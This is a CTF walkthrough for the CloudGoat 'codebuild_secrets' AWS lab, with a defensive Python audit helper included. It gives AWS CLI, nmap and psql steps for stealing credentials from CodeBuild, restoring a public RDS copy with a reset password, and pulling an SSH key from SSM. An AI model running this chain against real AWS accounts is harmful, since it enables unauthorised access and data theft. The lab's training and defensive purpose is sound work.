CloudGoat AWS CTF solution - Scenario 9 (codebuild_secrets)

Scenario 9 - codebuild_secrets

git clone
cd cloudgoat
chmod +x
./ config whitelist --auto
./ create codebuild_secrets

Scenario Resources

  • RDS x 1
  • EC2 x 1

Scenario Start(s)

Scenario Goal(s)


Exploitation Route(s)

Walkthrough — Calrissian via RDS Snapshot

  1. As the IAM user Solo, the attacker explores the AWS environment, enumerates their permissions, and discovers they are able to list CodeBuild projects.
aws codebuild list-projects --profile solo
aws codebuild batch-get-projects --names cg-codebuild-codebuild_secrets_cgidnmff3ngu3y --profile solo
#the project details expose credentials for the Calrissian user, used as the calrissian profile from here on
#snapshot the existing RDS instance
aws rds create-db-snapshot --db-instance-identifier cg-rds-instance-codebuild-secrets-cgidnmff3ngu3y --db-snapshot-identifier cloudgoat --profile calrissian
#find a subnet group and security group to place the restored copy in
aws rds describe-db-subnet-groups --profile calrissian
aws ec2 describe-security-groups --profile calrissian
#restore the snapshot as a new, publicly accessible instance
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier copy-of-old --db-snapshot-identifier cloudgoat --db-subnet-group-name cloud-goat-rds-testing-subnet-group-codebuild_secrets_cgidnmff3ngu3y --publicly-accessible --vpc-security-group-ids sg-03bb0912657c162f0 --profile calrissian
#wait for the copy to become available and note its endpoint
aws rds describe-db-instances --profile calrissian
#reset the master password on the copy only; the original instance is untouched
aws rds modify-db-instance --db-instance-identifier copy-of-old --master-user-password cloudgoat --profile calrissian
#confirm PostgreSQL is reachable on the copy's endpoint
nmap -Pn --disable-arp-ping -n -vv -sS -p5432
psql -h -U cgadmin -d postgres
#list available databases
\l
#change to database
\c securedb
#list tables
\dt
select * from sensitive_information;

Walkthrough — Solo via EC2 Metadata service

  1. As Solo, the iam-enumerate tool was unable to determine SSM permissions, but on manually checking Solo's permissions we can see we have ssm:DescribeParameters and ssm:GetParameter.
aws ssm describe-parameters --profile solo
  2. In the account's SSM parameters, we found a pair of SSH keys stored without any encryption.
aws ssm get-parameter --name cg-ec2-private-key-codebuild_secrets_cgidnmff3ngu3y --profile solo
#write the private key to a file with its newlines restored and restrict its permissions
echo -e <ssh_key_without_newlines> > ssh_key_private.out
chmod 400 ssh_key_private.out
#find the instance's public address and log in with the key
aws ec2 describe-instances --profile solo
ssh -i ssh_key_private.out ubuntu@
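Both walkthroughs above turn on the same two findings: credentials readable in a CodeBuild project's environment variables, and an SSH key kept as an unencrypted SSM parameter. The audit helper below is an added example, not part of the original writeup or of CloudGoat; it takes the JSON shapes returned by `aws codebuild batch-get-projects` and `aws ssm describe-parameters` (boto3 responses can be passed in directly), and the sample responses, project and parameter names and the key id in it are constructed placeholders.

```python
import re

# Name fragments that indicate a credential rather than ordinary configuration.
SECRET_NAME_RE = re.compile(r"secret|password|passwd|token|private[_-]?key|access[_-]?key", re.I)
# Shape of an AWS access key id (long-term AKIA..., temporary ASIA...).
AWS_ACCESS_KEY_ID_RE = re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$")

def codebuild_plaintext_secrets(batch_get_projects_response):
    """(project, variable) pairs for PLAINTEXT env vars that look like secrets.
    PLAINTEXT values are returned in full to anyone with codebuild:BatchGetProjects;
    PARAMETER_STORE and SECRETS_MANAGER variables only carry a reference."""
    findings = []
    for project in batch_get_projects_response.get("projects", []):
        for var in project.get("environment", {}).get("environmentVariables", []):
            if var.get("type", "PLAINTEXT") != "PLAINTEXT":
                continue
            name, value = var.get("name", ""), str(var.get("value", ""))
            if SECRET_NAME_RE.search(name) or AWS_ACCESS_KEY_ID_RE.match(value):
                findings.append((project.get("name"), name))
    return findings

def ssm_unencrypted_keys(describe_parameters_response):
    """Names of parameters that look like key material but are not SecureString.
    describe-parameters returns no values, so the audit never reads the secret."""
    return [
        p["Name"]
        for p in describe_parameters_response.get("Parameters", [])
        if p.get("Type") != "SecureString" and SECRET_NAME_RE.search(p["Name"])
    ]

# Constructed sample responses in the shape of the CLI output; the names and
# the key id are placeholders, not values from any real account.
SAMPLE_PROJECTS = {"projects": [{
    "name": "cg-codebuild-example",
    "environment": {"environmentVariables": [
        {"name": "CALRISSIAN_AWS_ACCESS_KEY_ID", "value": "AKIAEXAMPLEEXAMPLE12", "type": "PLAINTEXT"},
        {"name": "DB_PASSWORD", "value": "/cg/db/password", "type": "PARAMETER_STORE"},
        {"name": "REGION", "value": "us-east-1", "type": "PLAINTEXT"},
    ]}}]}
SAMPLE_PARAMS = {"Parameters": [
    {"Name": "cg-ec2-private-key-example", "Type": "String"},
    {"Name": "cg-rds-password-example", "Type": "SecureString"},
]}

if __name__ == "__main__":
    print(codebuild_plaintext_secrets(SAMPLE_PROJECTS))  # [('cg-codebuild-example', 'CALRISSIAN_AWS_ACCESS_KEY_ID')]
    print(ssm_unencrypted_keys(SAMPLE_PARAMS))  # ['cg-ec2-private-key-example']
```

Any hit from the first function is a reason to move the variable to PARAMETER_STORE or SECRETS_MANAGER; any hit from the second is a parameter to recreate as a SecureString.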

Branch A

  1. Now with shell access, we can query the EC2 metadata service, discover the instance profile's IAM keys, and use them as the ec2_role profile.
aws lambda list-functions --profile ec2_role
#locate the database endpoint with the instance role
aws rds describe-db-instances --profile ec2_role
psql -h -U cgadmin -d securedb

Branch B

  1. Now with shell access, we query the EC2 metadata service and discover that the database address is stored there, along with admin credentials:
psql postgresql://
psql -h -U cgadmin -d securedb
#list tables
\dt
select * from sensitive_information;
